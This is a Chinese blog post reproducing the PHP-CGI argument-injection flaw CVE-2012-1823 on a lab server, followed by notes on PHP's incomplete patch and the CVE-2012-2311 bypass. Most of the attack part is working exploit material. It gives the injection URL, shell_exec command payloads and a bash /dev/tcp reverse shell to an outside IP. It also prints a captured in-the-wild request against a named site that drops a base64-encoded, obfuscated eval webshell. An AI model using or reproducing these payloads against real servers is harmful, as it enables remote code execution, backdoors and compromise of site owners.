phpcgi 代码执行 (CVE-2012-1823) 复现

已于 2022-08-22 05:58:42 修改
阅读量596 收藏 2
点赞数
文章标签: 安全 web安全
于 2022-08-22 05:52:35 首次发布
原文链接:https://blog.csdn.net/youthbelief/article/details/121145793
版权

phpcgi 代码执行 (CVE-2012-1823)
通过阅读源码,发现cgi模式下通过可控命令行参数有如下一些参数可用:
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-? 显示帮助

访问下边页面 返回源码 说明存在该漏洞
ip:port/index.php/?-s

0x01 漏洞描述


CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。

0x02 影响范围
php-5.3.12 以下

0x03 漏洞复现


(1) 访问靶场主页

http://118.193.36.37:46102/index.html

在这里插入图片描述

(2)访问 /index.php

http://118.193.36.37:46102/index.php
在这里插入图片描述

(3) 访问下边页面 返回源码 说明存在该漏洞

http://118.193.36.37:46102/index.php/?-s

在这里插入图片描述

存在该漏洞

任意代码执行


访问下边网址burp 抓包

http://118.193.36.37:46102/index.php/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input


post请求体如下

<?php echo shell_exec("id"); ?>

在这里插入图片描述
执行成功

ls /tmp 

<?php echo shell_exec("ls /tmp"); ?>

在这里插入图片描述


反弹shell

<?php echo shell_exec("bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"); ?>
失败 可能 权限不足

在这里插入图片描述

在这里插入图片描述


0x04 漏洞修复


漏洞修复参考 https://www.cnblogs.com/riginal/p/11314565.html

CVE-2012-2311
这个漏洞被爆出来以后,PHP官方对其进行了修补,发布了新版本5.4.2及5.3.12,但这个修复是不完全的,可以被绕过,进而衍生出CVE-2012-2311漏洞。

PHP的修复方法是对-进行了检查:

if(query_string = getenv("QUERY_STRING")) {
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        if(*decoded_query_string == '-' && strchr(decoded_query_string, '=') == NULL) {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }

可见,获取querystring后进行解码,如果第一个字符是-则设置skip_getopt,也就是不要获取命令行参数。

这个修复方法不安全的地方在于,如果运维对php-cgi进行了一层封装的情况下:

 #!/bin/sh  
 exec /usr/local/bin/php-cgi $*

通过使用空白符加-的方式,也能传入参数。这时候querystring的第一个字符就是空白符而不是-了,绕过了上述检查。

于是,php5.4.3和php5.3.13中继续进行修改:

if((query_string = getenv("QUERY_STRING")) != NULL && strchr(query_string, '=') == NULL) {
        /* we've got query string that has no = - apache CGI will pass it to command line */
        unsigned char *p;
        decoded_query_string = strdup(query_string);
        php_url_decode(decoded_query_string, strlen(decoded_query_string));
        for (p = decoded_query_string; *p &&  *p <= ' '; p++) {
            /* skip all leading spaces */
        }
        if(*p == '-') {
            skip_getopt = 1;
        }
        free(decoded_query_string);
    }

先跳过所有空白符(小于等于空格的所有字符),再判断第一个字符是否是-。

数据包:

POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
X-Forwarded-For: 90.178.234.124
Client-IP: 90.178.234.124
REMOTE_ADDR: 90.178.234.124
Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html    
Referer: http://www.hntrnp.com/?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
Host: www.hntrnp.com
Content-Length: 838

<?php
echo md5(niubi);
fputs(fopen('niubi.php', w) , base64_decode('PD9waHAKJHBhc3N3b3JkPSdweXRob24nOyRiPSJjaHIiO3Nlc3Npb25fc3RhcnQoKTtpZihlbXB0eSgkX1NFU1NJT05bJ1BocENvZGUnXSkpeyRkPSRiKDEwNCkuJGIoMTE2KS4kYigxMTYpLiRiKDExMikuJGIoNTgpLiRiKDQ3KS4kYig0NykuJGIoNTcpLiRiKDU0KS4kYig1NCkuJGIoNDkpLiRiKDQ2KS4kYigxMDUpLiRiKDExMCkuJGIoNDcpLiRiKDExMikuJGIoMTA0KS4kYigxMTIpLiRiKDQ3KS4kYigxMTIpLiRiKDEwNCkuJGIoMTEyKS4kYig0NikuJGIoMTAzKS4kYigxMDUpLiRiKDEwMik7JGU9JGIoMTAyKS4kYigxMDUpLiRiKDEwOCkuJGIoMTAxKS4kYig5NSk7JGUuPSRiKDEwMykuJGIoMTAxKS4kYigxMTYpLiRiKDk1KS4kYig5OSk7JGUuPSRiKDExMSkuJGIoMTEwKS4kYigxMTYpLiRiKDEwMSkuJGIoMTEwKTskZS49JGIoMTE2KS4kYigxMTUpOyRfU0VTU0lPTlsnUGhwQ29kZSddPSRlKCRkKTt9JGY9JGIoMTAzKS4kYigxMjIpLiRiKDEwNSkuJGIoMTEwKTskZi49JGIoMTAyKS4kYigxMDgpLiRiKDk3KS4kYigxMTYpLiRiKDEwMSk7QGV2YWwoJGYoJF9TRVNTSU9OWydQaHBDb2RlJ10pKTs='));
?>

十月ljj
关注
CVE-2012-1823PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1437
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3298
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
CVE-2012-1823漏洞复现
qq_46804551的博客
05-27 607
前言 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。 复现 在相应的漏洞环
【网络】详解HTTP协议的CGI机制和CGI进程
最新发布
2301_79796701的博客
09-18 663
CGI机制是HTTP协议提供的偏底层的一套机制,也是非常重要的机制——它让大量的业务进程和HTPP协议解耦。而CGI进程是业务层的,用来处理各种数据,比如把用户提交上来的数据插入数据库,再比如做某种运算。CGI机制和CGI进程在概念上是完全不一样的,他们的关系就行老婆和老婆饼一样。客户端通过HTTP协议向服务器提交数据的方式主要有两种:1.GET方法请求,GET方法没有请求正文,一般用来拉取服务器的数据,但也可以通过URL的参数提交数据(URL中?分隔符后面的就是要提交的数据)
CVE-2012-1823复现
hhiollk的博客
03-31 1088
PHP-CGI远程代码执行漏洞 这个古老的漏洞,其实就是用户请求的querystring被作为了php-cgi的参数,命令行参数不仅可以通过 #!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12php < 5.4.2mod方式...
CGI,FastCGIPHP-CGIPHP-FPM概念分析
fisher的博客
03-25 1314
CGI CGI全称是“公共网关接口”(Common Gateway Interface),HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等。 FastCGI FastCGI像是一个常驻(long-live)型的CGI,它可以一直执行
PHP CGI
weixin_30279671的博客
07-01 82
cgi是通用网关接口,是连接web服务器和应用程序的接口。 web服务器负责接收http请求,但是http请求从request到response的过程需要有应用程序的逻辑处理,web服务器一般是使用C写的,比如nginx,apache。而应用程序则是由各种语言编写,比如php,java,python等。这两种语言要进行交互就需要有个协议进行规定,而cgi就是这么个网关协议。 ...
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 979
PHP-CGI远程代码执行漏洞(CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 475
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出现在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
【漏洞复现CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1710
【漏洞复现CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
CVE-2012-1823:phpcgi 代码执行
Foreverlove112的博客
11-08 1188
CVE-2012-1823:phpcgi 代码执行
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1106
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
漏洞复现CVE-2012-1823PHP-CGI远程代码执行
ASD830的博客
06-18 589
发现flag,查看即可得到flag{32a52c19-c1db-4479-ac54-ab59d8d45977}可以发现其php版本为5.4.1,而且可以看到一个cve字样:cve20121823。得到index.php和info.php,使用cat命令查看一下index.php。提示我们这里没什么东西,我们猜测flag可能在根目录下,目录穿越一下。接着我们使用-d 指定配置项,这里我们可以结合post请求执行命令。发现info.php,直接访问/info.php。首先我们使用-s命令查看一下源代码
cve-2012-1823漏洞复现
m0_74402888的博客
04-28 719
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。cgi:它是一种协议。通过cgi协议,web server可以将动态请求和相关参数发送给专门处理动态内容的应用程序。
php-cgi
is_scarecrow的博客
06-24 226
【fastCGI的进程管理】fastcgi会先启动一个master,解析配置文件,初始化执行环境,然后再启动多个worker,当请求过来的时候,master会传递给一个worker,然后立即可以接收下一个请求,这样就避免重复的劳动,效率自然也就高了,而且当worker不够用时,master可以根据配置预先启动几个worker等着,当然worker太多的时候,也会停掉一些,这样就提高到了性能,同时一定程度上节约了资源。Php-cgiPHP解释器,就是上文提到的CGI程序。
PHP-CGI远程代码执行漏洞CVE-2012-1823漏洞复现
qq_29365787的博客
12-10 1324
一、漏洞介绍 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 影响范围: 漏洞影响版本 php < 5.3.12 or php < 5.4.2 PS:CVE-2012-1823是在php-cgi运行模式下出现的漏洞,其漏洞只出现在以cgi模式运行的php中 二、PHP运行的四种模式: 1)cgi 通用网关接口(
PHP-CGI远程代码执行
qq_53701412的博客
04-17 730
PHP SAPL
PHPCGI实现
weixin_34301307的博客
06-09 152
FastCGI简介 CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行Web服务器上的程序请求数据。 CGI描述了客户端和这个程序之间传输数据的一种标准。 CGI的一个目的是要独立于任何语言的,所以CGI可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等 FastCGI像是...
CVE-2021-44228远程代码执行复现与环境搭建指南
资源摘要信息:"CVE-2021-44228是2021年底爆出的一个重大安全漏洞,属于Apache Log4j 2的远程代码执行漏洞。Log4j 2广泛应用于Java应用中,用于日志记录。该漏洞允许攻击者通过插入恶意的JNDI(Java Naming and ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值